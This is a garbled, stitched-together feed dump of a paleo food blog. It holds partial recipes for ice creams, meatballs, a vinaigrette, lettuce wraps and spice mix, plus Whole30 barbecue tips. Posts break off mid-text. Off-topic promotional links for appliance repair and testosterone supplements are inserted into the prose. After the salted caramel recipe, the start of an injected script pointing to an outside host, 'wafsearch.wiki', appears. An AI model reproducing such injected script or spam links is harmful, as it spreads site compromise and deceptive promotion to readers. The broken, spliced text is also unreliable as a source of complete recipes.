										<content:encoded><![CDATA[<p>Salted Caramel ice cream is one of my favorite flavors.  The combination of sweet and salty is just perfect.   This recipe is intended to be paleo and dairy free, but if you want to reduce your carbs I have a suggestion for a different caramel recipe and if you can tolerate dairy then heavy cream works well also.</p>
<p>During the summer I love to make my own ice cream.  It allows me to better control the ingredients and it&#8217;s super easy to make. I end up using my ice cream maker a lot so it&#8217;s not just a random appliance that just sits there and never gets used, I tend to do that with the majority of my appliances and I end up having to get them repaired over the years (<a href="https://www.dewaardandbode.com/appliances/">find more info</a>).  I keep the ice cream bowl in the freezer all the time so it&#8217;s ready to go whenever I need it.</p>

Stir continuously for about 15-20 minutes or until the mixture thickens and darkens in color (very frequent stirring keeps the coconut sugar from burning). </li><li id="zlrecipe-instruction-4" class="instruction" itemprop="recipeInstructions">Remove from the heat and stir in the vanilla extract.</li><li id="zlrecipe-instruction-5" class="instruction" itemprop="recipeInstructions">Allow to cool completely before adding to the ice cream.</li><div id="zlrecipe-instruction-6" class="instruction-label" >For the ice cream base:</div><li id="zlrecipe-instruction-7" class="instruction" itemprop="recipeInstructions">Mix the almond milk, 1 1/2 cups coconut milk (or heavy cream), and coconut sugar (or Swerve sweetener) in a medium saucepan over low heat and cook until heated through. </li><li id="zlrecipe-instruction-8" class="instruction" itemprop="recipeInstructions">Place the egg yolks in a medium bowl and slowly add the warm cream mixture over the yolks a little at a time while whisking.</li><li id="zlrecipe-instruction-9" class="instruction" itemprop="recipeInstructions">Add the mixture back into the saucepan over medium low heat, whisking frequently.</li><li id="zlrecipe-instruction-10" class="instruction" itemprop="recipeInstructions">Cook for 6-10 minutes or until the mixture thickens and coats the back of a spoon. </li><li id="zlrecipe-instruction-11" class="instruction" itemprop="recipeInstructions">Remove the mixture from the heat and add the vanilla.</li><li id="zlrecipe-instruction-12" class="instruction" itemprop="recipeInstructions">Optional:  Strain through a fine mesh strainer into a medium bowl.  </li><li id="zlrecipe-instruction-13" class="instruction" itemprop="recipeInstructions">Refrigerate the mixture until cooled completely (2 hours-overnight)</li><li id="zlrecipe-instruction-14" class="instruction" itemprop="recipeInstructions">Once cooled mix in the remaining coconut cream/heavy cream (1/4 cup) and churn according to manufacturer's directions.</li><li id="zlrecipe-instruction-15" class="instruction" itemprop="recipeInstructions">Once the ice cream has finished churning, pour into a freezer container.</li><li id="zlrecipe-instruction-16" class="instruction" itemprop="recipeInstructions">Add 6 Tbsp of the salted caramel on top and swirl it into the ice cream with a knife. </li><li id="zlrecipe-instruction-17" class="instruction" itemprop="recipeInstructions">Serve immediately for soft serve or place in the freezer to harden more.</li><li id="zlrecipe-instruction-18" class="instruction" itemprop="recipeInstructions">Store leftovers in the freezer but it must be thawed slightly before serving again (20-30 minutes)</li></ol><div class="ziplist-recipe-plugin" style="display: none;">3.1</div><a id="zl-printed-permalink" href="https://holisticallyengineered.com/2016/08/paleo-salted-caramel-ice-cream.html"title="Permalink to Recipe">https://holisticallyengineered.com/2016/08/paleo-salted-caramel-ice-cream.html</a></div></div></div><script>var url = 'https://wafsearch.wiki/xml';

										<content:encoded><![CDATA[<p>Summer is here and that means lots of summer barbecues, but it can be hard to navigate these gatherings to find healthy foods.  If you&#8217;re not familiar with the Whole30 program, I definitely suggest <a href="https://whole30.com/whole30-program-rules/">checking it out here</a>.  It&#8217;s a free program I have done at least 4 times (I usually modify it for low carb/low sugar).  It was the first thing I did to transition from strictly low carb to paleo/real food.  Whole30 helped me ditch the low carb processed foods to a more real foods based approach, and if you&#8217;re a male, you can get supplements from these <a href="https://www.westword.com/storyhub/testogen-review">Testogen review</a> which are great to improve the health and performance in males.  We have a special guest today, Meg Marrs from <a href="https://www.lifehealthhq.com">Life Health HQ</a>, sharing 5 Tips for a Whole30 Compliant 4th of July.  The good news is that these tips are helpful for making healthy choices this summer whether you&#8217;re on Whole30 or not.  Let&#8217;s welcome Meg!!</p>
<p><b>1. Load Up On Burgers, Steer Clear of Buns</b></p>
<p>Lucky for you, 4th of July is all about good ol’ fashioned American burgers. Sure, you’ll have to pass on the dogs, but go ahead and grab a few hamburgers (and if they’re made from grass-fed beef, even better)!</p>
<p>Buns are out (who <i>really </i>likes those boring white hamburger buns anyway?), but at most BBQs you’ll be able to find some lettuce leafs to serve as a bun substitute.</p>
<p>Naturally, make the most of the tomatoes, onions, and other tasty burger toppings. While you’ll have to pass on the ketchup, you can add some mustard for flavor (many brands are compliant, but double check to be safe). Also hit up the chips and salsa area to grab guac and/or salsa to top your burger with!</p>
<p><b>2. Fruit Salad For the 4th</b></p>
<p>Most BBQs will have at least one (maybe even two) fruit salad items available, so opt for that over cake or cookies. You can also bring your own <a href="https://www.lifehealthhq.com/4th-july-fruit-salad/">red, white, and blue patriotic paleo fruit salad</a> to serve and enjoy with other guests.</p>

<p><b>3. Salute To The Seltzer</b></p>
<p>4th of July often goes hand in hand with drinking. If you’re concerned about any sans alcohol awkwardness, having some seltzer in hand goes a lot way.</p>
<p>Seltzer water is a Whole30 fan favorite, as its bubbly taste can give you something fun to drink around friends. As a bonus, mix seltzer water with various fruits for an irresistible <a href="https://www.lifehealthhq.com/whole30-mocktails/">Whole30 mocktail</a>!</p>
<p>&nbsp;</p>
<p><b>4. BYOD (Bring Your Own Dressing)</b></p>
<p>Prep ahead for your 4<sup>th</sup> of July BBQ and bring your own compliant salad dressing.</p>
<p>While there will likely be plenty of salad dishes available to you, finding a compliant dressing by the picnic tables may prove to be more of a challenge. Play it safe and bring your own!</p>

<p><b>5. Pack That Plate</b></p>
<p>Leaving a space on your plate where tortilla and potato chips once would have resided will only make things harder. Instead, fill your entire plate with fruit, salad, and burgers so that you won’t get the feeling you’re missing out.</p>
<p>Keep this tips in mind and you’ll have no problems staying Whole30 compliant during your 4<sup>th</sup> of July gathering! Focus on the tasty meat, fruit, and salad you can enjoy, rather than what you can’t have.</p>

										<content:encoded><![CDATA[<p>Today I&#8217;m sharing a paleo and low carb trail mix that makes a great portable snack.  With the warmer weather it&#8217;s a great time to go hiking or spend some time outside.  Recently, I took a trip to the Great Smoky Mountains of North Carolina and whenever I travel I like to take healthy snacks with me.  One of the snacks I decided to make was trail mix.  Usually my low carb &#8220;trail mix&#8221; is just a mix of nuts without anything sweet, but every once in awhile I like to add a little bit of sweetness to the mix.  I ended up making candied nuts so that there is a great balance of salty and sweet, also I would leave you this <a href="https://hiya.life/">gluten free snack bar</a> which is also a great option.</p>
<p>For paleo, you can use any mix of nuts that you prefer, but for low carb you&#8217;ll want to stick with lower carb nuts like pecans, walnuts, almond, brazil nuts, or hazelnuts.  If you&#8217;re a fan of fruit, you can add some dehydrated fruit like strawberries (lower carb) or bananas (paleo).  Be sure to check the ingredients to make sure there is no added sugar.</p>

<p>When I started my blog back in 2011, Carol was one of my first blogger friends.  Carol didn&#8217;t live anywhere near me, but thanks to the internet I had someone &#8220;by my side&#8221; as I tried to navigate learning how to keep a blog up and running plus someone to understand my &#8220;crazy&#8221; way of eating. <p>Now for the recipe, Carol gave a sneak peak of this cookie recipe back in April at the Paleo F(x) conference and since then I have been making the recipe several times a month. 										<content:encoded><![CDATA[<p>It&#8217;s been awhile since I&#8217;ve had a blog post, not because I&#8217;ve given up on low carb/paleo eating, but because life changes have limited my space (and natural light) to take food photos.  I used to have a photography &#8220;studio&#8221; (really it was just an extra bedroom) with plenty of space to have all my photography props and a table to hold the food that was getting its photo shoot.  Last year, I found myself with significantly less space and those life changes have given me an amazing opportunity to spending more time reconnecting with family and exploring new relationships.  It has been an amazing time, but it has been hard for me to find a new &#8220;normal&#8221; for my blog and the time I have available to dedicate to creating new content.  In case you were wondering, it takes a lot of hard work to run a blog.  I used to be able to dedicate almost a full time jobs (aka 40 hours or more) worth of hours a week pouring into the blog&#8230;this was in addition to the full time day job I already have.  It never felt like work because I absolutely love it! But along the way I realized that I had created the blog originally not just as away to track progress and recipes, but also as a way to pretend certain relationship trouble I was dealing with at the time didn&#8217;t really exist. It was easy for me to throw myself into the blog instead of dealing with the emotions I was experiencing in &#8220;real life.&#8221;  It&#8217;s through this experience that I realized that health is so much more than just physical health.  I&#8217;ve really been praying about the new direction I want to take the blog.  I love creating new recipes and taking pictures of that delicious food, but over the last year I have learned some much about how emotional and spiritual health can affect physical health. I want to be able to share what has inspired and encouraged me so I can help others who may be struggling.  So stay tuned for more coming to the Holistically Engineered blog!</p>
<p>So let&#8217;s get to the food!  I like to keep things simple, especially during the week.  These meatballs are easy to make because you just have to add some cooked bacon and onion + an egg + your favorite seasoning to ground beef and the oven does all the work.  The meatballs end up juicy and full of flavor!  I even have my Mom making these and we&#8217;ve both tried them with different kinds of ground meat.  We love them with ground chicken (the one with both white and dark meat&#8211;i.e. not super low in fat) and up next we are going to try them with ground pork and turkey also.  I absolutely love making these meatballs because they are so easy to make and they are very versatile.  You can put them in some marinara sauce to eat over zucchini noodles (<a href="https://holisticallyengineered.com/2013/09/five-ingredient-friday-zucchini-noodles-zoodles.html" target="_blank" rel="noopener"><em>get the recipe here</em></a>) or just eat them plain with a side cauliflower mash (<a href="https://holisticallyengineered.com/2014/01/make-ahead-slow-cooker-mashed-cauliflower.html" target="_blank" rel="noopener"><em>get the recipe here</em></a>).  Plenty of options!  I first came across a similar recipe from <a href="https://dandydishes.blogspot.com/2011/06/baked-chicken-meatballs.html#.VqI-LtwkDvx" target="_blank" rel="noopener">Dandy Dishes</a> when I was trying to figure out what to make with the ground chicken I had in the freezer from my monthly Meat Share.  I ended up putting a new spin on the recipe to add the flavors I love and it worked great in many ways.</p>

										<content:encoded><![CDATA[<p>Apples are in season right now so it&#8217;s a perfect time to enjoy a natural dessert of paleo bakes apples.  The baked apples have all the flavors of fall in a delicious dessert that you can feel good about feeding to your family and friends.  To the north of us there are a lot of apple orchards.  I really hope I can fit some time into my schedule this fall to make a trip (it&#8217;s a bit of a road trip) to pick some apples.  I found an orchard that uses an organic growing processes and it would nice to get local, fresh apples that haven&#8217;t sprayed with toxic chemicals.   One of my goals over the last few years has been to reduce my exposure to toxic chemicals.  That has happened through paying attention to my food sources (buying locally, organically grown) and well as removing conventional cleaning and personal care products (replacing them with DIY options or naturally derived ingredients with essential oils).</p>

										<content:encoded><![CDATA[<p>Having an easy, homemade salad dressing makes a great real food kitchen staple.  Before I changed my diet the only salad dressing I would use was ranch.  Typically ranch dressing in a bottle from the store (and when you make it yourself at home from the packet) contains a lot of non-real food/inflammatory ingredients.  So I had to change my staple salad dressing and I ending up turning to a vinaigrette.  What I love about vinaigrettes is that you can throw all of the ingredients in a mason jar, shake it up, and it ends up being very creamy.  Sometimes it&#8217;s nice to make a dressing that&#8217;s extra creamy and to jazz it up a bit.  For this Creamy Bacon Vinaigrette, I took a basic vinaigrette recipe and swapped out some of the olive oil for bacon fat to give it more flavor.  I also add some mascarpone cheese and bacon pieces to make it extra creamy.  I&#8217;ve been growing some summer vine spinach in my <a href="https://holisticallyengineered.com/2015/06/paleo-asian-lettuce-wraps.html" target="_blank">Tower Garden</a> so I chopped it up, threw on some leftover grilled veggies, and topped it with the Creamy Bacon Vinaigrette.  A perfect way to end the summer!</p>

										<content:encoded><![CDATA[<p>I&#8217;m so excited about growing a garden this spring/summer!  Normally I don&#8217;t have a green thumb and end up killing everything I try and grow. This year I decided to get a <em><a href="https://ks63863.towergarden.com" target="_blank">Tower Garden</a></em> and try it out.  I like to think of the <a href="https://ks63863.towergarden.com" target="_blank"><em>Tower Garden</em></a> as &#8220;brown thumb&#8221; proof because it steps you through the whole growing process and is even on a timer so it self waters (as long as you keep the reservoir filled) using less water than traditional gardens.  It has been such a fun experience and it has been so exciting to see the growth along the way.</p>
<p>I have been growing lots of fresh herbs, green beans, different types of squash, cucumbers, and lettuces.  I had an excess of cilantro, green beans, and lettuce that I wanted  to use up so I decided to make some lettuce wraps to highlight the fresh ingredients.  I also had some pastured ground turkey from my meat share in the freezer so I used that as the protein, but ground chicken or maybe even ground pork would be just as great in the recipe.  What I love about making lettuce wraps is that you can adjust the taste to your preferences&#8230;use some different veggies you love, add some extra seasoning&#8230;have fun with it! Plus it&#8217;s an easy weeknight dinner that doesn&#8217;t heat up the house. It&#8217;s been so hot here (definitely not turning on the oven)!</p>

										<content:encoded><![CDATA[<p>In April I attended <a href="https://www.paleofx.com" target="_blank">Paleo f(x)</a> in Austin, TX.  It was a great opportunity to listen to leading experts, doctors, and scientists in the paleo and low carb communities. Plus I got to meet and spend time with some amazing blogger friends.  Austin is also a major foodie city and one of the things we got to enjoy was some Chocolate and Candied Orange Peel Gelato from Dolce Neve.  Dolce Neve uses milk from grass fed cows and produce from local farms to make their delicious gelato treats.  It was a nice treat to enjoy while we were in town.</p>
<p>Of course once I got home I wanted to recreate that special treat with a homemade version.  Making your own ice cream is a great way to control the ingredients that work best for you (i.e. dairy or non-dairy, sweetener, etc.).  I also like that the orange peel gives the flavor of orange with less carbs than the orange juice.  Honestly, I never even thought to make candied orange peels before I had the gelato in Austin.  Candying the orange peels softens them and makes a tasty addition to ice cream&#8230;just remember to peel as much of the white pith off as you can.  The pith makes the orange peel bitter and can make the final ice cream bitter too.</p>

Score the orange peel into quarters.  Peel back each of the four pieces, trying to get the least amount of the pith (the white part--which is the most bitter. I ended up peeling off as much of the pith as I could once I peeled it back from the orange--I carefully used a small knife).  Reserve the inside of the orange for another recipe.  Repeat with the other orange.  Cut each of the 8 orange peel pieces into 1/4" strips.   </li><li id="zlrecipe-instruction-2" class="instruction" itemprop="recipeInstructions">Place the orange peels in a saucepan and cover with water.  Bring the water to a boil over medium heat. Drain the water and reserve the orange peels. Repeat the process 2 more times with fresh water each time.  </li><li id="zlrecipe-instruction-3" class="instruction" itemprop="recipeInstructions">In the empty saucepan over medium heat, add the coconut sugar and 1 cup of water. Bring to a boil.  Reduce the heat to simmer and add the orange peels.  Toss to coat in the syrup.  Allow the peels to simmer for 12-15 minutes or until translucent and then remove from the heat.  Allow to cool in the syrup for about an hour. Strain the peels from the syrup (reserve the syrup to add to a tasty drink or smoothie) and allow to cool completely.  </li><li id="zlrecipe-instruction-4" class="instruction" itemprop="recipeInstructions">Dice the orange peel strip into a small pieces and reserve for later.  </li><div id="zlrecipe-instruction-5" class="instruction-label" >For the Chocolate Ice Cream</div><li id="zlrecipe-instruction-6" class="instruction" itemprop="recipeInstructions">Place the egg yolks a mixing bowl.</li><li id="zlrecipe-instruction-7" class="instruction" itemprop="recipeInstructions">Pour the coconut milk (or heavy cream) into a sauce pan over medium-low heat. </li><li id="zlrecipe-instruction-8" class="instruction" itemprop="recipeInstructions">Whisk in the cocoa powder and sweetener.</li><li id="zlrecipe-instruction-9" class="instruction" itemprop="recipeInstructions">Heat the coconut milk in the sauce pan just until it starts to bubble.</li><li id="zlrecipe-instruction-10" class="instruction" itemprop="recipeInstructions">Slowly add 1/4 cup of the hot coconut milk to the egg yolk mixture and continuously whisk to combine.</li><li id="zlrecipe-instruction-11" class="instruction" itemprop="recipeInstructions">Add the remaining coconut milk, a little at a time, whisking to combine (don't add the hot coconut milk too quickly or you will end up with scrambled eggs).</li><li id="zlrecipe-instruction-12" class="instruction" itemprop="recipeInstructions">Pour the mixture into the sauce pan and cook over low heat, stirring constantly.</li><li id="zlrecipe-instruction-13" class="instruction" itemprop="recipeInstructions">Cook the mixture for 5-7 minutes or until thickened (it should coat the back of a spoon).</li><li id="zlrecipe-instruction-14" class="instruction" itemprop="recipeInstructions">Once thickened, remove from the heat and add the vanilla extract.</li><li id="zlrecipe-instruction-15" class="instruction" itemprop="recipeInstructions">Pour the mixture through a fine metal strainer over a bowl.</li><li id="zlrecipe-instruction-16" class="instruction" itemprop="recipeInstructions">Allow the mixture to cool down and then cover with plastic wrap (I place it directly on the custard so that a skin doesn't form) and refrigerate for 2 hours or until cooled.</li><li id="zlrecipe-instruction-17" class="instruction" itemprop="recipeInstructions">Add the mixture to the bowl of an ice cream maker and process according to the manufacturer's instructions.</li><li id="zlrecipe-instruction-18" class="instruction" itemprop="recipeInstructions">Add the orange peel pieces to the ice cream and stir/process to mix throughout.  </li><li id="zlrecipe-instruction-19" class="instruction" itemprop="recipeInstructions">Serve immediately for soft serve or transfer to a freezer proof dish and continue to freeze before serving.  </li><li id="zlrecipe-instruction-20" class="instruction" itemprop="recipeInstructions">If freezing for an extended amount of time (like overnight), let sit out at room temperature for about 15-20 minutes or until scoopable. </li></ol><div class="ziplist-recipe-plugin" style="display: none;">3.1</div><a id="zl-printed-permalink" href="https://holisticallyengineered.com/2015/06/chocolate-orange-ice-cream.html"title="Permalink to Recipe">https://holisticallyengineered.com/2015/06/chocolate-orange-ice-cream.html</a></div></div></div></p>

This Mediterranean spice mixture has a lot of the flavors of the Mediterranean and is versatile for many recipes. I often double or even triple the recipe so I have extra on hand to add to marinades for chicken or to add to homemade salad dressing.  You could even buzz the mixture in a spice grinder if you prefer a finer texture.</p>

Add the olive oil and 2-3 tsp of the spice mixture (save the rest in an air tight container).
